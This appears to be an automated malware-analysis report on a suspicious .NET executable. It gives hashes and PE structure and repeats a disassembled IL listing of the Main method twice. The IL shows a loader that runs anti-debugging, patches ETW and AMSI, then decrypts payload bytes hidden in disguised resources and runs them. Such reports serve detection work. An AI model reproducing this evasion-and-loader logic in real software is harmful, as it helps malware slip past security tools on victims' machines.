Suspicious
Suspect

7f79b66b9bb5099415224be7ac33fb3c

PE Executable
|
MD5: 7f79b66b9bb5099415224be7ac33fb3c
|
Size: 4.51 MB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

High

Hash
 Hash Value
MD5
7f79b66b9bb5099415224be7ac33fb3c
Sha1
919452142afa1b6ec8dc55ad5264b00fb9a9c191
Sha256
6437c30cb1a5d692f9aa0b1614b7889a01313c7bf9de788ced4de3652bf901d5
Sha384
69afd3a3319871b8b9510181e3ce5a974b21afaceb05ff470268598d04b87b49e535e681b4e3c1d390eb829455bdf8bf
Sha512
f5a6c355622fca538e86675d82a57e6cc3556b35268285b84c1d2d54b4ec986ba0901aac7a0fca427f3157d603f60b118b57159b2e265db9bb69a9bc71cef657
SSDeep
12288:LGhsgwdIMvh+BjuYlJWY9+GBcDWiqGJAZZs:
TLSH
C626239FA7BCCC1CEBC4E6B26527DEF508339611580B6F922DE421758271D928ED10AF

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
7f79b66b9bb5099415224be7ac33fb3c
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.text2e4
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
.Net Resources
System.Windows.Forms.resources
Microsoft.VisualBasic.resources
System.ServiceModel.resources
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

1t5tolfo.u4o.exe
Full Name

1t5tolfo.u4o.exe
EntryPoint

System.Void T2d99ec63::Main(System.String[])
Scope Name

1t5tolfo.u4o.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

1t5tolfo.u4o
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

17
Main Method

System.Void T2d99ec63::Main(System.String[])
Main IL Instruction Count

243
Main IL

call System.Boolean T2d99ec63::R02112673() brtrue.s IL_000C: call System.Void T2d99ec63::AntiDebug() leave IL_0249: ret call System.Void T2d99ec63::AntiDebug() ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_001F: ldloc.2 ldloc.0 <null> ldloc.2 <null> add <null> stloc.0 <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4 1000000 blt.s IL_0017: ldloc.0 ldloc.0 <null> ldc.i4.0 <null> bge.s IL_0030: ldc.i4 2000 leave IL_0249: ret ldc.i4 2000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4.0 <null> stloc.1 <null> br IL_023C: ldloc.1 ldloc.1 <null> switch dnlib.DotNet.Emit.Instruction[] br IL_0239: ldc.i4.s 10 call System.Void T2d99ec63::Pb2f951d0() ldc.i4.1 <null> stloc.1 <null> br IL_023C: ldloc.1 call System.Void T2d99ec63::PatchETW() ldc.i4.2 <null> stloc.1 <null> br IL_023C: ldloc.1 call System.Void T2d99ec63::PatchAMSI() ldc.i4.3 <null> stloc.1 <null> br IL_023C: ldloc.1 ldc.i4.4 <null> stloc.1 <null> br IL_023C: ldloc.1 ldc.i4.s 32 newarr System.Byte dup <null> ldtoken Tbc14254a/Tc0066bcf Tbc14254a::F4e5c45246dc2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.3 <null> ldc.i4.s 16 newarr System.Byte dup <null> ldtoken Tbc14254a/T5696aaae Tbc14254a::F60f11878b01c call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_4 ldc.i4.s 16 newarr System.Byte dup <null> ldtoken Tbc14254a/T5696aaae Tbc14254a::Fe9412c34c6ee call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_5 ldc.i4.s 32 newarr System.Byte dup <null> ldtoken Tbc14254a/Tc0066bcf Tbc14254a::Ff9f3bb97aa7b call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_6 ldc.i4.s 32 newarr System.Byte dup <null> ldtoken Tbc14254a/Tc0066bcf Tbc14254a::Fabe982ebec8c call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_7 ldc.i4.3 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr System.Windows.Forms.resources stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr Microsoft.VisualBasic.resources stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr System.ServiceModel.resources stelem.ref <null> stloc.s V_8 ldc.i4.3 <null> newarr System.Int32 dup <null> ldtoken Tbc14254a/T3bba0d29 Tbc14254a::Fcdcabd458ab1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 ldc.i4.0 <null> stloc.s V_14 br.s IL_0139: ldloc.s V_14 ldloc.s V_10 ldloc.s V_9 ldloc.s V_14 ldelem.i4 <null> add <null> stloc.s V_10 ldloc.s V_14 ldc.i4.1 <null> add <null> stloc.s V_14 ldloc.s V_14 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0129: ldloc.s V_10 ldloc.s V_10 newarr System.Byte stloc.s V_11 ldc.i4.0 <null> stloc.s V_12 ldc.i4.0 <null> stloc.s V_15 br IL_01EB: ldloc.s V_15 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_8 ldloc.s V_15 ldelem.ref <null> callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_16 ldloc.s V_16 brtrue.s IL_016F: ldloc.s V_9 leave IL_0249: ret ldloc.s V_9 ldloc.s V_15 ldelem.i4 <null> ldc.i4.4 <null> mul <null> stloc.s V_17 ldloc.s V_17 newarr System.Byte stloc.s V_18 ldc.i4.0 <null> stloc.s V_19 br.s IL_01A4: ldloc.s V_19 ldloc.s V_16 ldloc.s V_18 ldloc.s V_19 ldloc.s V_17 ldloc.s V_19 sub <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ble.s IL_01AA: ldc.i4.0 ldloc.s V_19 ldloc.s V_20 add <null> stloc.s V_19 ldloc.s V_19 ldloc.s V_17 blt.s IL_0186: ldloc.s V_16 ldc.i4.0 <null> stloc.s V_21 br.s IL_01C4: ldloc.s V_21 ldloc.s V_11 ldloc.s V_12 ldloc.s V_21 add <null> ldloc.s V_18 ldloc.s V_21 ldc.i4.4 <null> mul <null> ldelem.u1 <null> stelem.i1 <null> ldloc.s V_21 ldc.i4.1 <null> add <null> stloc.s V_21 ldloc.s V_21 ldloc.s V_9 ldloc.s V_15 ldelem.i4 <null> blt.s IL_01AF: ldloc.s V_11 ldloc.s V_12 ldloc.s V_9 ldloc.s V_15 ldelem.i4 <null> add <null> stloc.s V_12 leave.s IL_01E5: ldloc.s V_15 ldloc.s V_16 brfalse.s IL_01E4: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_15 ldc.i4.1 <null> add <null> stloc.s V_15 ldloc.s V_15 ldloc.s V_8 ldlen <null> conv.i4 <null> blt IL_0155: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_11 ldloc.s V_7 call System.Byte[] T2d99ec63::Xb418c4a1(System.Byte[],System.Byte[]) stloc.s V_13 ldloc.s V_13 ldloc.s V_6 call System.Byte[] T2d99ec63::R1a2d4f87(System.Byte[],System.Byte[]) stloc.s V_13 ldloc.s V_13 ldloc.3 <null> ldloc.s V_4 ldloc.s V_5 call System.Byte[] T2d99ec63::D55022201(System.Byte[],System.Byte[],System.Byte[],System.Byte[]) stloc.s V_13 ldloc.s V_13 brfalse.s IL_0234: ldc.i4.s 10 ldloc.s V_13 ldlen <null> brfalse.s IL_0234: ldc.i4.s 10 ldc.i4 500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_13 call System.Void T2d99ec63::M8d83c80c(System.Byte[]) ldc.i4.s 10 stloc.1 <null> br.s IL_023C: ldloc.1 ldc.i4.s 10 stloc.1 <null> ldloc.1 <null> ldc.i4.s 10 blt IL_0041: ldloc.1 leave.s IL_0249: ret pop <null> leave.s IL_0249: ret ret <null>
Module Name

1t5tolfo.u4o.exe
Full Name

1t5tolfo.u4o.exe
EntryPoint

System.Void T2d99ec63::Main(System.String[])
Scope Name

1t5tolfo.u4o.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

1t5tolfo.u4o
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

17
Main Method

System.Void T2d99ec63::Main(System.String[])
Main IL Instruction Count

243
Main IL

call System.Boolean T2d99ec63::R02112673() brtrue.s IL_000C: call System.Void T2d99ec63::AntiDebug() leave IL_0249: ret call System.Void T2d99ec63::AntiDebug() ldc.i4.0 <null> stloc.0 <null> ldc.i4.0 <null> stloc.2 <null> br.s IL_001F: ldloc.2 ldloc.0 <null> ldloc.2 <null> add <null> stloc.0 <null> ldloc.2 <null> ldc.i4.1 <null> add <null> stloc.2 <null> ldloc.2 <null> ldc.i4 1000000 blt.s IL_0017: ldloc.0 ldloc.0 <null> ldc.i4.0 <null> bge.s IL_0030: ldc.i4 2000 leave IL_0249: ret ldc.i4 2000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldc.i4.0 <null> stloc.1 <null> br IL_023C: ldloc.1 ldloc.1 <null> switch dnlib.DotNet.Emit.Instruction[] br IL_0239: ldc.i4.s 10 call System.Void T2d99ec63::Pb2f951d0() ldc.i4.1 <null> stloc.1 <null> br IL_023C: ldloc.1 call System.Void T2d99ec63::PatchETW() ldc.i4.2 <null> stloc.1 <null> br IL_023C: ldloc.1 call System.Void T2d99ec63::PatchAMSI() ldc.i4.3 <null> stloc.1 <null> br IL_023C: ldloc.1 ldc.i4.4 <null> stloc.1 <null> br IL_023C: ldloc.1 ldc.i4.s 32 newarr System.Byte dup <null> ldtoken Tbc14254a/Tc0066bcf Tbc14254a::F4e5c45246dc2 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.3 <null> ldc.i4.s 16 newarr System.Byte dup <null> ldtoken Tbc14254a/T5696aaae Tbc14254a::F60f11878b01c call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_4 ldc.i4.s 16 newarr System.Byte dup <null> ldtoken Tbc14254a/T5696aaae Tbc14254a::Fe9412c34c6ee call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_5 ldc.i4.s 32 newarr System.Byte dup <null> ldtoken Tbc14254a/Tc0066bcf Tbc14254a::Ff9f3bb97aa7b call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_6 ldc.i4.s 32 newarr System.Byte dup <null> ldtoken Tbc14254a/Tc0066bcf Tbc14254a::Fabe982ebec8c call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_7 ldc.i4.3 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr System.Windows.Forms.resources stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr Microsoft.VisualBasic.resources stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr System.ServiceModel.resources stelem.ref <null> stloc.s V_8 ldc.i4.3 <null> newarr System.Int32 dup <null> ldtoken Tbc14254a/T3bba0d29 Tbc14254a::Fcdcabd458ab1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 ldc.i4.0 <null> stloc.s V_14 br.s IL_0139: ldloc.s V_14 ldloc.s V_10 ldloc.s V_9 ldloc.s V_14 ldelem.i4 <null> add <null> stloc.s V_10 ldloc.s V_14 ldc.i4.1 <null> add <null> stloc.s V_14 ldloc.s V_14 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0129: ldloc.s V_10 ldloc.s V_10 newarr System.Byte stloc.s V_11 ldc.i4.0 <null> stloc.s V_12 ldc.i4.0 <null> stloc.s V_15 br IL_01EB: ldloc.s V_15 call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_8 ldloc.s V_15 ldelem.ref <null> callvirt System.IO.Stream System.Reflection.Assembly::GetManifestResourceStream(System.String) stloc.s V_16 ldloc.s V_16 brtrue.s IL_016F: ldloc.s V_9 leave IL_0249: ret ldloc.s V_9 ldloc.s V_15 ldelem.i4 <null> ldc.i4.4 <null> mul <null> stloc.s V_17 ldloc.s V_17 newarr System.Byte stloc.s V_18 ldc.i4.0 <null> stloc.s V_19 br.s IL_01A4: ldloc.s V_19 ldloc.s V_16 ldloc.s V_18 ldloc.s V_19 ldloc.s V_17 ldloc.s V_19 sub <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) stloc.s V_20 ldloc.s V_20 ldc.i4.0 <null> ble.s IL_01AA: ldc.i4.0 ldloc.s V_19 ldloc.s V_20 add <null> stloc.s V_19 ldloc.s V_19 ldloc.s V_17 blt.s IL_0186: ldloc.s V_16 ldc.i4.0 <null> stloc.s V_21 br.s IL_01C4: ldloc.s V_21 ldloc.s V_11 ldloc.s V_12 ldloc.s V_21 add <null> ldloc.s V_18 ldloc.s V_21 ldc.i4.4 <null> mul <null> ldelem.u1 <null> stelem.i1 <null> ldloc.s V_21 ldc.i4.1 <null> add <null> stloc.s V_21 ldloc.s V_21 ldloc.s V_9 ldloc.s V_15 ldelem.i4 <null> blt.s IL_01AF: ldloc.s V_11 ldloc.s V_12 ldloc.s V_9 ldloc.s V_15 ldelem.i4 <null> add <null> stloc.s V_12 leave.s IL_01E5: ldloc.s V_15 ldloc.s V_16 brfalse.s IL_01E4: endfinally ldloc.s V_16 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_15 ldc.i4.1 <null> add <null> stloc.s V_15 ldloc.s V_15 ldloc.s V_8 ldlen <null> conv.i4 <null> blt IL_0155: call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() ldloc.s V_11 ldloc.s V_7 call System.Byte[] T2d99ec63::Xb418c4a1(System.Byte[],System.Byte[]) stloc.s V_13 ldloc.s V_13 ldloc.s V_6 call System.Byte[] T2d99ec63::R1a2d4f87(System.Byte[],System.Byte[]) stloc.s V_13 ldloc.s V_13 ldloc.3 <null> ldloc.s V_4 ldloc.s V_5 call System.Byte[] T2d99ec63::D55022201(System.Byte[],System.Byte[],System.Byte[],System.Byte[]) stloc.s V_13 ldloc.s V_13 brfalse.s IL_0234: ldc.i4.s 10 ldloc.s V_13 ldlen <null> brfalse.s IL_0234: ldc.i4.s 10 ldc.i4 500 call System.Void System.Threading.Thread::Sleep(System.Int32) ldloc.s V_13 call System.Void T2d99ec63::M8d83c80c(System.Byte[]) ldc.i4.s 10 stloc.1 <null> br.s IL_023C: ldloc.1 ldc.i4.s 10 stloc.1 <null> ldloc.1 <null> ldc.i4.s 10 blt IL_0041: ldloc.1 leave.s IL_0249: ret pop <null> leave.s IL_0249: ret ret <null>
7f79b66b9bb5099415224be7ac33fb3c (4.51 MB)
File Structure
7f79b66b9bb5099415224be7ac33fb3c
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.text2e4
.reloc
Resources
RT_VERSION
ID:0001
ID:1033
.Net Resources
System.Windows.Forms.resources
Microsoft.VisualBasic.resources
System.ServiceModel.resources
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙